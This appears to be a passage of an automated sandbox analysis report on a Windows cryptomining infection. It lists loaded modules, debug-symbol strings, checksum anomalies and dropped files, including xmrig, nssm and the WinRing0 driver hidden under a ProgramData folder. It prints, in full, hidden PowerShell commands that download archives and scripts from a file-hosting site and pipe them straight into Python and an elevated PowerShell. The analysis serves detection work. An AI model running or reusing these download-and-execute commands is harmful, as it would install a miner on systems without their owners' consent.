                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                    Source: C:\ProgramData\.logstxt\nssm.exeSection loaded: apphelp.dll
                    Source: C:\ProgramData\.logstxt\nssm.exeSection loaded: cryptbase.dll
                    Source: C:\ProgramData\.logstxt\nssm.exeSection loaded: apphelp.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: apphelp.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: iphlpapi.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: userenv.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: cryptbase.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: opencl.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: xmrig-cuda.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: nvcuda.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: nvrtc64_120_0.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: powrprof.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: umpdc.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: mswsock.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: dhcpcsvc.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: dnsapi.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: napinsp.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: pnrpnsp.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: wshbth.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: nlaapi.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: winrnr.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: kernel.appcore.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: explorerframe.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: rasadhlp.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeSection loaded: fwpuclnt.dll
                    Source: C:\ProgramData\.logstxt\xmrig.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb; source: powershell.exe, 00000009.00000002.2050378919.00000236FDDE1000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Vinay\Projects\simple_launcher\dist\t64.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680BA2000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: softy.pdb source: powershell.exe, 00000009.00000002.2048314360.00000236FDD2E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1946719482.0000023680EA3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2045796761.00000236FDA12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2039838656.00000236FBB50000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\mscorlib.pdbe,"U source: powershell.exe, 0000000F.00000002.2373129297.000001B6503B1000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000009.00000002.2048314360.00000236FDD2E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2369713930.000001B64FED4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.2039838656.00000236FBB50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2373129297.000001B65036C000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.2378326274.000001B6503C7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: _hashlib.pyd.9.dr
                    Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.2046798962.00000236FDA44000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: _queue.pyd.9.dr
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: powershell.exe, 0000000F.00000002.2170524020.000001B63827B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2170524020.000001B638064000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680A8A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: powershell.exe, 00000009.00000002.1946719482.0000023680F3E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb16 source: powershell.exe, 00000009.00000002.2048314360.00000236FDD2E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\winsound.pdb source: powershell.exe, 00000009.00000002.1946719482.0000023680FE0000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('"fun.zip','.'); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:TEMP; Start-Process powershell -verb runas -ArgumentList '-WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ;'"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ;
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:TEMP; Start-Process powershell -verb runas -ArgumentList '-WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ;'"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('"fun.zip','.'); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ; Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ; Jump to behavior
                    Source: vcruntime140_1.dll.9.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001FE78 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,19_2_000000014001FE78
                    Source: pip.exe.9.drStatic PE information: real checksum: 0x2a492 should be: 0x24b3a
                    Source: _MD4.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x515c
                    Source: _ghash_portable.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0xd444
                    Source: md.cp312-win_amd64.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0xf040
                    Source: cli-32.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x3aa1
                    Source: cli.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x3aa1
                    Source: pip3.exe.9.drStatic PE information: real checksum: 0x2a492 should be: 0x24b3a
                    Source: _poly1305.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0xdb12
                    Source: _x25519.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0xcaa5
                    Source: t64-arm.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x2dfec
                    Source: _SHA256.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x15159
                    Source: _SHA512.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x1587a
                    Source: _ed25519.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0xcf1c
                    Source: _BLAKE2b.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0xd302
                    Source: _MD5.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x5d11
                    Source: _ed448.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x18622
                    Source: normalizer.exe.9.drStatic PE information: real checksum: 0x2a492 should be: 0x20df2
                    Source: _ghash_clmul.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x13062
                    Source: w64-arm.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x34bf6
                    Source: _SHA384.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x11f20
                    Source: _modexp.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x168fd
                    Source: cli-arm64.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x79fa
                    Source: cli-64.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x5e39
                    Source: wheel.exe.9.drStatic PE information: real checksum: 0x2a492 should be: 0x262ad
                    Source: nvrtc-builtins64_124.dll.15.drStatic PE information: real checksum: 0x0 should be: 0x559da4
                    Source: _BLAKE2s.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x46c6
                    Source: _MD2.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x428b
                    Source: _SHA224.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0xe61e
                    Source: _SHA1.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x12012
                    Source: xmrig.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x618a96
                    Source: _scrypt.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x9e88
                    Source: _RIPEMD160.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x5b66
                    Source: _keccak.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0x100e7
                    Source: _ec_ws.pyd.9.drStatic PE information: real checksum: 0x0 should be: 0xc3cc0
                    Source: pip3.12.exe.9.drStatic PE information: real checksum: 0x2a492 should be: 0x24b3a
                    Source: vcruntime140.dll.9.drStatic PE information: section name: fothk
                    Source: vcruntime140.dll.9.drStatic PE information: section name: _RDATA
                    Source: xmrig.exe.15.drStatic PE information: section name: _RANDOMX
                    Source: xmrig.exe.15.drStatic PE information: section name: _TEXT_CN
                    Source: xmrig.exe.15.drStatic PE information: section name: _TEXT_CN
                    Source: xmrig.exe.15.drStatic PE information: section name: _RDATA
                    Source: xmrig-cuda.dll.15.drStatic PE information: section name: .nv_fatb
                    Source: xmrig-cuda.dll.15.drStatic PE information: section name: .nvFatBi
                    Source: xmrig-cuda.dll.15.drStatic PE information: section name: _RDATA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFAACB974F3 push ebx; iretd 9_2_00007FFAACB9756A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAACB90CCE push eax; retf 12_2_00007FFAACB90D4D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB85D38 pushad ; iretd 15_2_00007FFAACB85D93
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB85D33 pushad ; iretd 15_2_00007FFAACB85D93
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB853B5 push eax; ret 15_2_00007FFAACB85429
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB8FB5D push esp; retf 15_2_00007FFAACB8FB5E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB852FA push eax; ret 15_2_00007FFAACB85429
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACC5C2AD pushfd ; retn 0000h15_2_00007FFAACC5C355
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACC5A656 push ss; iretd 15_2_00007FFAACC5A657
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACC5C370 push ss; retn 0000h15_2_00007FFAACC5C371

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\WinRing0x64.sys
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_wmi.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_ctypes.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_multiprocessing.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Scripts\pip.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_overlapped.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA384.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\t64-arm.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli-arm64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_socket.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\vcruntime140_1.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\nvrtc-builtins64_124.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\t32.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_ssl.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Protocol\_scrypt.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\w32.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\nvrtc64_120_0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_MD4.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_poly1305.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA224.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA512.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_queue.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_ed25519.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_MD5.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\w64-arm.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\nvrtc-builtins64_124.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_sqlite3.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\select.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_decimal.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli-32.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Math\_modexp.pydJump to dropped file
